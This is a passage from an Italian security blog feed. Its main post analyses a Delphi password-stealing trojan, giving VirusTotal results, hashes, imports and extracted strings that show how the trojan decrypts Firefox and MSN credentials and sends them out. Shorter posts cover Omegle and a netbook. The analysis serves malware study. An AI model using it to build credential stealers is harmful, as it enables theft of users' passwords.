Hint[959]<br />KERNEL32.dll.VirtualAlloc Hint[885]<br />KERNEL32.dll.GetCommandLineA Hint[264]<br />KERNEL32.dll.LeaveCriticalSection Hint[583]<br />KERNEL32.dll.GetCurrentProcessId Hint[315]<br />KERNEL32.dll.WaitForSingleObject Hint[901]<br />KERNEL32.dll.GetVersionExA Hint[479]<br />KERNEL32.dll.CreateFileA Hint[77]<br />KERNEL32.dll.SetEndOfFile Hint[773]<br />KERNEL32.dll.GetThreadLocale Hint[464]<br />KERNEL32.dll.ExitProcess Hint[175]<br />KERNEL32.dll.HeapDestroy Hint[522]<br />KERNEL32.dll.QueryPerformanceCounter Hint[665]<br />KERNEL32.dll.FreeLibrary Hint[239]<br />KERNEL32.dll.DeleteFileA Hint[124]<br />KERNEL32.dll.ReadFile Hint[683]<br />KERNEL32.dll.GetModuleHandleA Hint[375]<br />KERNEL32.dll.TlsFree Hint[855]<br />KERNEL32.dll.LCMapStringA Hint[570]<br />KERNEL32.dll.GetCurrentProcess Hint[314]<br /><br />----------Resource directory----------<br /><br />[IMAGE_RESOURCE_DIRECTORY]<br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />MajorVersion: 0x0 <br />MinorVersion: 0x0 <br />NumberOfNamedEntries: 0x0 <br />NumberOfIdEntries: 0x2 <br />Id: [0x6] (RT_STRING)<br />[IMAGE_RESOURCE_DIRECTORY_ENTRY]<br />Name: 0x6 <br />OffsetToData: 0x80000020<br />[IMAGE_RESOURCE_DIRECTORY]<br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />MajorVersion: 0x0 <br />MinorVersion: 0x0 <br />NumberOfNamedEntries: 0x0 <br />NumberOfIdEntries: 0x2 <br /> Id: [0x1]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x1 <br /> OffsetToData: 0x80000058<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x0 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x409 <br /> OffsetToData: 0xA0 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x442F0<br /> Size: 0x700 <br /> CodePage: 0x0 <br /> Reserved: 0x0 <br /> Id: [0x2]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x2 <br /> OffsetToData: 0x80000070<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x0 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x409 <br /> OffsetToData: 0xB0 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x449F0<br /> Size: 0x546 <br /> CodePage: 0x0 <br /> Reserved: 0x0 <br /><br />Id: [0x10] (RT_VERSION)<br />[IMAGE_RESOURCE_DIRECTORY_ENTRY]<br />Name: 0x10 <br />OffsetToData: 0x80000040<br />[IMAGE_RESOURCE_DIRECTORY]<br />Characteristics: 0x0 <br />TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br />MajorVersion: 0x0 <br />MinorVersion: 0x0 <br />NumberOfNamedEntries: 0x0 <br />NumberOfIdEntries: 0x1 <br /> Id: [0x1]<br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x1 <br /> OffsetToData: 0x80000088<br /> [IMAGE_RESOURCE_DIRECTORY]<br /> Characteristics: 0x0 <br /> TimeDateStamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]<br /> MajorVersion: 0x0 <br /> MinorVersion: 0x0 <br /> NumberOfNamedEntries: 0x0 <br /> NumberOfIdEntries: 0x1 <br /> [IMAGE_RESOURCE_DIRECTORY_ENTRY]<br /> Name: 0x409 <br /> OffsetToData: 0xC0 <br /> [IMAGE_RESOURCE_DATA_ENTRY]<br /> OffsetToData: 0x440D0<br /> Size: 0x220 <br /> CodePage: 0x0 <br /> Reserved: 0x0<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7230810893311077425?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.comtag:blogger.com,1999:blog-2454834713612225354.post-3185150111503420992009-09-25T08:45:00.000-07:002009-09-25T09:34:44.276-07:00Falsi positivi:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_P4KmVMnbtiU/SrWT_udlBNI/AAAAAAAAASE/_AVlwCYqpTc/s1600-h/av-false.JPG"><img style="cursor: pointer; width: 320px; height: 180px;" src="http://3.bp.blogspot.com/_P4KmVMnbtiU/SrWT_udlBNI/AAAAAAAAASE/_AVlwCYqpTc/s320/av-false.JPG" alt="" id="BLOGGER_PHOTO_ID_5383371652604429522" border="0"></a><br />Virus non trovati (più la percentuale è bassa e più Virus sono stati rilevati correttamente):<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_P4KmVMnbtiU/SrWT495snaI/AAAAAAAAAR8/AXtIuxfAgLU/s1600-h/av-missed.JPG"><img style="cursor: pointer; width: 320px; height: 193px;" src="http://3.bp.blogspot.com/_P4KmVMnbtiU/SrWT495snaI/AAAAAAAAAR8/AXtIuxfAgLU/s320/av-missed.JPG" alt="" id="BLOGGER_PHOTO_ID_5383371536489815458" border="0"></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-318515011150342099?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-1924147701472125672009-09-25T05:39:00.000-07:002009-09-26T17:27:04.124-07:00Qualche giorno fa stavo scrivendo su Skype con un mio amico e mi fa:" Guarda questo blog sicuramente ti piacerà è di un ragazzo che fa RE (reverse engineering)" io ci guardo un pò e gli dico : " ma è su windows!" e lui mi risponde :" be come vuoi fare Reverse Engineering ???"<br /><br />...<br /><br />Per questo Report ho utilizzato <span style="color: rgb(0, 51, 0);">sia ida pro per <span style="color: rgb(204, 0, 0);">Debian/GnuLinux</span> che Qemu Zero-wine per <span style="color: rgb(204, 0, 0);">Debian/GnuLinux</span></span><br /><br /><br />MD5 Sum: ddafe247beef63ccb926fbf8f69743fa<br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Visto da <a href="http://www.virustotal.com">Virustotal.com</a>:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />Antivirus Version Last Update Result<br />a-squared 4.5.0.24 2009.09.25 Trojan-PWS.Win32.Stealer!IK<br />AhnLab-V3 5.0.0.2 2009.09.24 Win-Trojan/Stealer.61952<br />AntiVir 7.9.1.25 2009.09.25 TR/Agent.61952<br />Antiy-AVL 2.0.3.7 2009.09.25 Trojan/Win32.Stealer.gen<br />Authentium 5.1.2.4 2009.09.25 -<br />Avast 4.8.1351.0 2009.09.24 -<br />AVG 8.5.0.412 2009.09.25 Generic13.BYDC<br />BitDefender 7.2 2009.09.25 Trojan.Generic.2463633<br />CAT-QuickHeal 10.00 2009.09.25 -<br />ClamAV 0.94.1 2009.09.25 Trojan.Spy-64234<br />Comodo 2432 2009.09.25 TrojWare.Win32.PSW.Delf.~B<br />DrWeb 5.0.0.12182 2009.09.25 -<br />eSafe 7.0.17.0 2009.09.24 -<br />eTrust-Vet 31.6.6760 2009.09.25 -<br />F-Prot 4.5.1.85 2009.09.24 -<br />F-Secure 8.0.14470.0 2009.09.25 Trojan-PSW.Win32.Stealer.w<br />Fortinet 3.120.0.0 2009.09.25 W32/Stealer.W!tr.pws<br />GData 19 2009.09.25 Trojan.Generic.2463633<br />Ikarus T3.1.1.72.0 2009.09.25 Trojan-PWS.Win32.Stealer<br />Jiangmin 11.0.800 2009.09.25 Trojan/PSW.Stealer.bn<br />K7AntiVirus 7.10.853 2009.09.24 -<br />Kaspersky 7.0.0.125 2009.09.25 Trojan-PSW.Win32.Stealer.w<br />McAfee 5751 2009.09.24 -<br />McAfee+Artemis 5751 2009.09.24 -<br />McAfee-GW-Edition 6.8.5 2009.09.25 Heuristic.LooksLike.Win32.PasswordStealer.H<br />Microsoft 1.5005 2009.09.23 -<br />NOD32 4456 2009.09.25 Win32/PSW.Delf.NSI<br />Norman 6.01.09 2009.09.24 -<br />nProtect 2009.1.8.0 2009.09.25 Trojan-PWS/W32.Agent.62464.C<br />Panda 10.0.2.2 2009.09.24 Trj/AOLPS.UB<br />PCTools 4.4.2.0 2009.09.25 -<br />Prevx 3.0 2009.09.25 -<br />Rising 21.48.43.00 2009.09.25 -<br />Sophos 4.45.0 2009.09.25 Troj/PWS-BEG<br />Sunbelt 3.2.1858.2 2009.09.24 -<br />Symantec 1.4.4.12 2009.09.25 -<br />TheHacker 6.5.0.2.017 2009.09.24 -<br />TrendMicro 8.950.0.1094 2009.09.25 -<br />VBA32 3.12.10.11 2009.09.25 Trojan-PSW.Win32.Stealer.w<br />ViRobot 2009.9.25.1956 2009.09.25 -<br />VirusBuster 4.6.5.0 2009.09.24 -<br />Additional information<br />File size: 62464 bytes<br />MD5...: ddafe247beef63ccb926fbf8f69743fa<br />SHA1..: fd13aa01f63ec5ab53b8dc79ad8acf6ab929328d<br />SHA256: 4384cee81b789e08c0ffb8911537020205f1de2f15ee683700dc558b1e433ade<br />ssdeep: 1536:HGIy8OgkxGVZ0QexBwNeEgm0dh/kkvZ9/9x:HGIy8rV3enFEYIU/9x<br />PEiD..: -<br />PEInfo: PE Structure information<br /><br />( base data )<br />entrypointaddress.: 0xc134<br />timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)<br />machinetype.......: 0x14c (I386)<br /><br />( 9 sections )<br />name viradd virsiz rawdsiz ntrpy md5<br />.text 0x1000 0xa76c 0xa800 6.55 a1e897ffbf736747891241d5bcb92c62<br />.itext 0xc000 0xfd8 0x1000 5.83 096f208a28c87836ee442ac54ecde283<br />.data 0xd000 0xaf8 0xc00 1.99 dc14823419ba6a245f722b673d59601b<br />.bss 0xe000 0x3804 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e<br />.idata 0x12000 0xb9e 0xc00 4.84 bba371f3713ddeb9be7ba133b2e7c278<br />.tls 0x13000 0x8 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e<br />.rdata 0x14000 0x18 0x200 0.21 837fbcb55aef26898bcc1cf60d98712a<br />.reloc 0x15000 0xe6c 0x1000 6.36 1f6a3d5d729113c1c56409d79e5465c4<br />.rsrc 0x16000 0xd54 0xe00 3.63 f6771ce6bb2b37a7fc0fa79cbdfe3727<br /><br />( 10 imports )<br />> oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen<br />> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey<br />> user32.dll: GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA<br />> kernel32.dll: GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle<br />> kernel32.dll: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA<br />> user32.dll: TranslateMessage, MessageBoxA, LoadStringA, GetSystemMetrics, DispatchMessageA, CharNextA, CharToOemA<br />> kernel32.dll: WriteFile, VirtualQuery, Sleep, SizeofResource, ReadFile, LockResource, LoadResource, LoadLibraryA, GetVersionExA, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetFileSize, GetFileAttributesA, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeLibrary, FindResourceA, EnumCalendarInfoA, DeleteFileA, CreateFileA, CloseHandle<br />> advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, GetUserNameA<br />> advapi32.dll: CredEnumerateA<br />> wsock32.dll: WSACleanup, WSAStartup, gethostbyname, socket, send, inet_ntoa, inet_addr, htons, connect, closesocket<br /><br />( 0 exports )<br />RDS...: NSRL Reference Data Set<br />-<br />pdfid.: -<br />trid..: Win32 Executable Generic (38.4%)<br />Win32 Dynamic Link Library (generic) (34.1%)<br />Win16/32 Executable Delphi generic (9.3%)<br />Generic Win/DOS Executable (9.0%)<br />DOS Executable Generic (9.0%)<br />ThreatExpert info: <a href="http://www.threatexpert.com/report.aspx?md5=ddafe247beef63ccb926fbf8f69743fa" target="_blank">http://www.threatexpert.com/report.aspx?md5=ddafe247beef63ccb926fbf8f69743fa</a><br />sigcheck:<br />publisher....: n/a<br />copyright....: n/a<br />product......: n/a<br />description..: n/a<br />original name: n/a<br />internal name: n/a<br />file version.: n/a<br />comments.....: n/a<br />signers......: -<br />signing date.: -<br />verified.....: Unsigned<br /></pre><br /></div><br /><span style="color: rgb(51, 204, 0);">Vediamolo un pò più in dettaglio </span><br /><br /><span style="color: rgb(0, 51, 0);">Il programma è fatto in <span style="color: rgb(204, 51, 204);">Delphi </span></span><br /><br />FastMM Borland Edition<br />2004, 2005 Pierre le Riche / Professional Software Development<br /><br /><span style="color: rgb(0, 51, 0);">Il virus cerca di prendere le password di firefox e msn</span><br /><br />SOFTWARE\<br />Mozilla<br />Firefox<br />CurrentVersion<br />\Main<br />Install Directory<br />PSWV<br />ZYYd<br />nspr4.dll<br />plc4.dll<br />plds4.dll<br />mozcrt19.dll<br />sqlite3.dll<br />nssutil3.dll<br />softokn3.dll<br />nss3.dll<br />NSS_Init<br />NSSBase64_DecodeBuffer<br />PK11_GetInternalKeySlot<br />PK11_Authenticate<br />PK11SDR_Decrypt<br />NSS_Shutdown<br />PK11_FreeSlot<br />APPDATA<br />\Mozilla\Firefox\profiles.ini<br />Path<br />Profile0<br />\Mozilla\Firefox\<br />--------------------<br />--------------------<br />(unnamed value)<br />PK11_Authenticate Failed!<br />PK11_GetInternalKeySlot Failed!<br />NSS_Init Failed!<br /><br /><br /><span style="color: rgb(0, 51, 0);">decifrandole </span><span style="color: rgb(0, 51, 0);">per poi collegarsi a un host remoto </span><br /><br />SVW3<br />ZYYd<br />ZYYd<br />ZYYd<br />http<br />ZYYd<br />ZYYd<br />QSVW<br />$ZXw<br />ZYYd<br />ZYYd<br />ZYYd<br />HOST<br />3bkdhkvT5gQ<br />USER<br />PASS<br />LINK<br />si spedisce anche per mail<br />MAIL<br />ANTI1<br />TRUE<br /><br /><span style="color: rgb(0, 51, 0);">parti di sript per disabilitare antivirus </span><br /><br />ANTI2<br />ANTI3<br />ANTI4<br />ANTI5<br />ANTI6<br />ANTI7<br />ANTI8<br />ANTI9<br />ANTI10<br />ANTI11<br />ANTI12<br />ANTI13<br />ANTI14<br />ANTI15<br /><br /><span style="color: rgb(0, 51, 0);">cercando di inviarle e formattando le password sia di msn che di firefox</span><br /><br />--------------------<br />---------MSN--------<br />WindowsLive:name=*<br />Email:<br />Password:<br />FIREFOX<br />-------FIREFOX------<br />update<br /><span style="color: rgb(0, 51, 0);">Crea il file c:/pass.txt</span><br />/pass.<br />.txt<br />MAILACTIVE<br />mail=<br />&amp;message=<br />POST /<br />HTTP/1.1<br />Connection: close<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length:<br />Host:<br />Accept: text/html<br /><br /><span style="color: rgb(0, 51, 0);">e si conclude il processo<br /><br />Entry point: 0000C134<br />Found OEP: 0040A688<br /><br />Qua potete vedere il dump del file<br /><div style="margin: 5px 20px 20px;"><br /><div class="smallfont" style="margin-bottom: 2px;">Code:</div><br /><pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: auto; height: 98px; text-align: left;"><br />00000667: Professional Software Development<br />00001C7E: Unknown String<br />00001CDA: Unexpected Memory Leak<br />00002E80: RTL FPUMaskValue<br />00004B08: GetLongPathNameA<br />00004D54: Locales<br />00004D77: Locales<br />0000737C: ggg yyyy<br />000086EF: GetDiskFreeSpaceExA<br />00008CE4: CreateToolhelp32Snapshot<br />00008D06: Heap32ListFirst Heap32ListNext<br />00008D1E: Heap32First Heap32Next<br />00008D4A: Toolhelp32ReadProcessMemory Process32First<br />00008D59: Process32Next<br />00008D7A: Process32FirstW Process32NextW<br />00008D89: Thread32First<br />00008D98: Thread32Next<br />00008DA9: Module32First<br />00008DB8: Module32Next<br />00008DCA: Module32FirstW<br />00008DD9: Module32NextW<br />000091B1: IsDebuggerPresent<br />00009573: InsideTm<br />000095C4: username<br />0000968B: currentuser<br />0000969F: CurrentUser<br />00009D7B: Mozilla<br />00009D8B: Firefox<br />00009DBA: CurrentVersion<br />00009DE5: Install Directory<br />0000A586: DecodeBuffer<br />0000A59F: GetInternalKeySlot<br />0000A5B1: Authenticate<br />0000A5C3: Decrypt<br />0000A5D0: Shutdown<br />0000A5E1: FreeSlot<br />0000A5EB: APPDATA<br />0000A628: Profile0<br />0000A986: j j j j<br />0000B8A4: 3bkdhkvT5gQ USER<br />0000B8B8: DIR LINK<br />0000B922: ANTI10<br />0000B92A: ANTI11<br />0000B932: ANTI12<br />0000B93A: ANTI13<br />0000B942: ANTI14<br />0000B94A: ANTI15<br />0000B9E3: FIREFOX<br />0000BAAE: u update<br />0000BAE6: MAILACTIVE<br />0000BB55: close<br />0000BB8F: urlencoded<br />0000C375: Runtime error at 00000000<br />0000CC91: SysFreeString<br />0000CCA7: SysReAllocStringLen<br />0000CCBB: SysAllocStringLen<br />0000CCDC: RegQueryValueExA<br />0000CCED: RegOpenKeyExA<br />0000CCFB: RegCloseKey<br />0000CD19: GetKeyboardType<br />0000CD29: DestroyWindow<br />0000CD37: LoadStringA<br />0000CD45: MessageBoxA<br />0000CD51: CharNextA<br />0000CD68: GetACP<br />0000CD7F: VirtualFree<br />0000CD8E: VirtualAlloc<br />0000CD9E: GetTickCount<br />0000CDB9: QueryPerformanceCounter<br />0000CDCE: GetCurrentThreadId<br />0000CDDE: VirtualQuery<br />0000CDF5: WideCharToMultiByte<br />0000CE0B: MultiByteToWideChar<br />0000CE16: lstrlenA<br />0000CE23: lstrcpynA<br />0000CE34: LoadLibraryExA<br />0000CE47: GetThreadLocale<br />0000CE59: GetStartupInfoA<br />0000CE6A: GetProcAddress<br />0000CE7E: GetModuleHandleA<br />0000CE94: GetModuleFileNameA<br />0000CEA6: GetLocaleInfoA<br />0000CEB6: GetLastError<br />0000CEC9: GetCommandLineA<br />0000CED7: FreeLibrary<br />0000CEE8: FindFirstFileA<br />0000CEF5: FindClose<br />0000CF03: ExitProcess<br />0000CF0F: WriteFile<br />0000CF2A: UnhandledExceptionFilter<br />0000CF3C: SetFilePointer<br />0000CF4C: SetEndOfFile<br />0000CF59: RtlUnwind<br />0000CF64: ReadFile<br />0000CF76: RaiseException<br />0000CF86: GetStdHandle<br />0000CF95: GetFileSize<br />0000CFA3: GetFileType<br />0000CFB1: CreateFileA<br />0000CFBF: CloseHandle<br />0000CFDB: TlsSetValue<br />0000CFE9: TlsGetValue<br />0000CFF6: LocalAlloc<br />0000D00A: GetModuleHandleA<br />0000D02A: TranslateMessage<br />0000D039: MessageBoxA<br />0000D047: LoadStringA<br />0000D05A: GetSystemMetrics<br />0000D06E: DispatchMessageA<br />0000D07B: CharNextA<br />0000D088: CharToOemA<br />0000D0A3: WriteFile<br />0000D0B2: VirtualQuery<br />0000D0CC: SizeofResource<br />0000D0D8: ReadFile<br />0000D0E8: LockResource<br />0000D0F8: LoadResource<br />0000D108: LoadLibraryA<br />0000D119: GetVersionExA<br />0000D128: GetTickCount<br />0000D13B: GetThreadLocale<br />0000D14A: GetStdHandle<br />0000D15C: GetProcAddress<br />0000D178: GetPrivateProfileStringA<br />0000D18C: GetModuleHandleA<br />0000D1A2: GetModuleFileNameA<br />0000D1B4: GetLocaleInfoA<br />0000D1C3: GetFileSize<br />0000D1D8: GetFileAttributesA<br />0000D1F3: GetEnvironmentVariableA<br />0000D207: GetDiskFreeSpaceA<br />0000D21B: GetCurrentProcess<br />0000D22E: GetComputerNameA<br />0000D23B: GetCPInfo<br />0000D249: FreeLibrary<br />0000D259: FindResourceA<br />0000D26D: EnumCalendarInfoA<br />0000D27B: DeleteFileA<br />0000D289: CreateFileA<br />0000D297: CloseHandle<br />0000D2B8: RegQueryValueExA<br />0000D2C9: RegOpenKeyExA<br />0000D2D7: RegCloseKey<br />0000D2EA: OpenProcessToken<br />0000D2FA: GetUserNameA<br />0000D31A: CredEnumerateA<br />0000D334: WSACleanup<br />0000D342: WSAStartup<br />0000D353: gethostbyname<br />0000D35C: socket<br />0000D38F: connect<br />0000D39D: closesocket<br />0000E168: 7 74787h7<br />0000E88D: D V C L A L<br />0000E89D: F I R E F O X<br />0000E8AF: H O S T<br />0000E8C7: P A C K A G E I N F O<br />0000E8D1: P A S S<br />0000E8DB: U S E R<br />0000E8ED: N o v e m b e r<br />0000E8FF: D e c e m b e r<br />0000E945: S u n d a y<br />0000E953: M o n d a y<br />0000E963: T u e s d a y<br />0000E977: W e d n e s d a y<br />0000E989: T h u r s d a y<br />0000E997: F r i d a y<br />0000E9A9: S a t u r d a y<br />0000E9EB: J a n u a r y<br />0000E9FD: F e b r u a r y<br />0000EA09: M a r c h<br />0000EA15: A p r i l<br />0000EA27: J u n e<br />0000EA31: J u l y<br />0000EA3F: A u g u s t<br />0000EA53: S e p t e m b e r<br />0000EA63: O c t o b e r<br />0000EA73: I n v a l i d<br />0000EA83: v a r i a n t<br />0000EA8D: t y p e<br />0000EAA3: c o n v e r s i o n<br />0000EAB3: I n v a l i d<br />0000EAC3: v a r i a n t<br />0000EAD7: o p e r a t i o n<br />0000EAE7: I n v a l i d<br />0000EAF9: a r g u m e n t<br />0000EB0B: E x t e r n a l<br />0000EB1F: e x c e p t i o n<br />0000EB39: A s s e r t i o n<br />0000EB47: f a i l e d<br />0000EB5B: I n t e r f a c e<br />0000EB77: s u p p o r t e d<br />0000EB8B: E x c e p t i o n<br />0000EBA3: s a f e c a l l<br />0000EBB1: m e t h o d<br />0000EBCB: l i n e<br />0000EBE5: A b s t r a c t<br />0000EBF1: E r r o r<br />0000EBFF: A c c e s s<br />0000EC13: v i o l a t i o n<br />0000EC29: a d d r e s s<br />0000EC43: m o d u l e<br />0000EC6B: a d d r e s s<br />0000ECB3: I n v a l i d<br />0000ECC3: p o i n t e r<br />0000ECD7: o p e r a t i o n<br />0000ECE7: I n v a l i d<br />0000ECF3: c l a s s<br />0000ED13: t y p e c a s t 0 A c c e s s<br />0000ED27: v i o l a t i o n<br />0000ED3D: a d d r e s s<br />0000ED61: a d d r e s s<br />0000ED75: A c c e s s<br />0000ED89: v i o l a t i o n<br />0000ED95: S t a c k<br />0000EDA7: o v e r f l o w<br />0000EDB7: C o n t r o l<br />0000EDD9: P r i v i l e g e d<br />0000EDF1: i n s t r u c t i o n<br />0000EE05: E x c e p t i o n<br />0000EE1F: m o d u l e<br />0000EE5B: A p p l i c a t i o n<br />0000EE75: E r r o r 1 F o r m a t<br />0000EE8F: i n v a l i d<br />0000EEAF: i n c o m p a t i b l e<br />0000EEB9: w i t h<br />0000EECB: a r g u m e n t<br />0000EEE3: a r g u m e n t<br />0000EEF9: f o r m a t<br />0000EF13: V a r i a n t<br />0000EF21: m e t h o d<br />0000EF2D: c a l l s<br />0000EF49: s u p p o r t e d<br />0000EF53: R e a d<br />0000EF5F: W r i t e<br />0000EF6B: E r r o r<br />0000EF7D: c r e a t i n g<br />0000EF8D: v a r i a n t<br />0000EF9D: s a f e<br />0000EFA9: a r r a y<br />0000EFB9: V a r i a n t<br />0000EFC9: s a f e<br />0000EFD5: a r r a y<br />0000EFE1: i n d e x<br />0000EFFD: b o u n d s<br />0000F01B: m e m o r y<br />0000F02F: e r r o r<br />0000F03F: F i l e<br />0000F053: f o u n d<br />0000F063: I n v a l i d<br />0000F075: f i l e n a m e<br />0000F087: m a n y<br />0000F091: o p e n<br />0000F09D: f i l e s<br />0000F0A7: F i l e<br />0000F0B5: a c c e s s<br />0000F0C3: d e n i e d<br />0000F0CD: R e a d<br />0000F0DB: b e y o n d<br />0000F0F3: f i l e<br />0000F0FD: D i s k<br />0000F107: f u l l<br />0000F117: I n v a l i d<br />0000F127: n u m e r i c<br />0000F133: i n p u t<br />0000F145: D i v i s i o n<br />0000F155: z e r o<br />0000F161: R a n g e<br />0000F16D: c h e c k<br />0000F179: e r r o r<br />0000F189: I n t e g e r<br />0000F19B: o v e r f l o w<br />0000F1AB: I n v a l i d<br />0000F1BD: f l o a t i n g<br />0000F1C9: p o i n t<br />0000F1DD: o p e r a t i o n<br />0000F1EF: F l o a t i n g<br />0000F1FB: p o i n t<br />0000F20D: d i v i s i o n<br />0000F21D: z e r o<br />0000F22F: F l o a t i n g<br />0000F23B: p o i n t<br />0000F24D: o v e r f l o w<br />0000F25F: F l o a t i n g<br />0000F26B: p o i n t<br />0000F27F: u n d e r f l o w<br />0000F2CA: lightstealer<br />0000F2D4: WinSock<br />0000F2DE: KWindows<br />0000F2E6: UTypes<br />0000F2F0: SysInit<br />0000F2F9: System<br />0000F30B: TlHelp32<br />0000F316: CryptApi<br />0000F320: WinInet<br />0000F32B: SysUtils<br />0000F336: ImageHlp<br />0000F341: SysConst<br />0000F341: SysConst<br /></pre><br /></div></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-192414770147212567?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-65224287576549887272009-09-25T01:53:00.000-07:002009-09-25T02:14:37.707-07:00<p>Chatta con lo sconosciuto<br /></p><p>Stavo girando sul blog di <a href="http://xkcd.com/">XKCD</a> (per cercare un sistema per implementare le vignette su questo blog) mentre attendo di finire l installazione di <a href="http://citrix.com/English/ps2/products/product.asp?contentID=683148">XEN</a> (si perchè ancora non è finita -.-') per fare analisi di malware che poi a tempo dovuto posterò e mi è finito l occhio su questo sito web...<br /></p><p><a href="http://omegle.com/"><img class="alignnone" src="http://imgs.xkcd.com/blag/omegle.png" alt="" height="229" width="450" /></a></p><p>Si chiama Omegle non ho guardato per cosa stia il titolo ma l'idea è molto divertente. Appare come una normalissima chat ma in realtà non si sa con chi si stia conversando perchè tu appari come you e lo sconosciuto come stranger.</p><p>Se la persona con cui parli non ti interessa puoi benissimo premere disconnetti e passare a un altra.</p><p>Sembra un pò il concetto dei <a href="http://en.wikipedia.org/wiki/Speed_dating">speed dating</a> basato sul presupposto che la prima impressione è quella che conta.</p><p>Il modo per affrontarli è facendosi una lista di cose che ci interessebere chiedere all'altra persona anche molto personali, (per esempio che libri ti piaciono leggere ?) per riuscire a capire nel minor tempo possibile la persona che hai di fronte. Purtroppo qua non c'è la parte olfattiva e visiva ma si potrebbe in futuro implementare la videoconferenza con sconosciuti.</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6522428757654988727?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-72105816534926554462009-09-22T07:08:00.000-07:002009-09-23T02:48:28.125-07:00<img alt="http://www.monclick.it//img_galleria_particolari/4EM/D1/D120/GDNBL10ITK006_big_20090513121246.jpg" src="http://www.monclick.it//img_galleria_particolari/4EM/D1/D120/GDNBL10ITK006_big_20090513121246.jpg" /><br /><br /><ul><li>LCD screen 10"</li><li>Resolution 1024 x 600</li><li>Mandriva G-Linux</li><li>CPU 900 Mhz 64bits Loongson™ 2F by STMicroelectronics</li><li>RAM 512MB DDR2</li><li>Removable storage 16GB Flash G-Key</li><li>WIFI 802.11 b/g</li><li>3 USB 2.0 ports (one used for the GKEY)</li><li>SD/ SD HC card reader</li><li>One VGA output</li><li>Sound card</li><li>Video card Silicon Motion SM502, 16 MB RAM</li><li>Ethernet RJ45 - 10/100Mbs LAN</li><li>Speakers / microphone</li><li>Webcam</li><li>Extended keyboard</li><li>Up to 4 hour autonomy</li><li>Dimensions 250 x 182 x 32mm (1.2kg)</li></ul><br />Per ora so solo che utilizza lo stesso processore del Yeeloong e che potete comprarlo <a href="http://www.monclick.it/schede/emtec/GDNBL10ITK006/gdium-liberty-1000.htm">qui a 199€</a><br /><br /><span style="color: rgb(0, 153, 0);">Ce ne sono solo ancora 2 disponibili !</span><br /><span style="color: rgb(0, 153, 0);">Io purtroppo di soldi non ne ho altrimenti l'avrei gia comprato :/</span><br /><span style="color: rgb(0, 153, 0);">Comunque se qualcuno lo 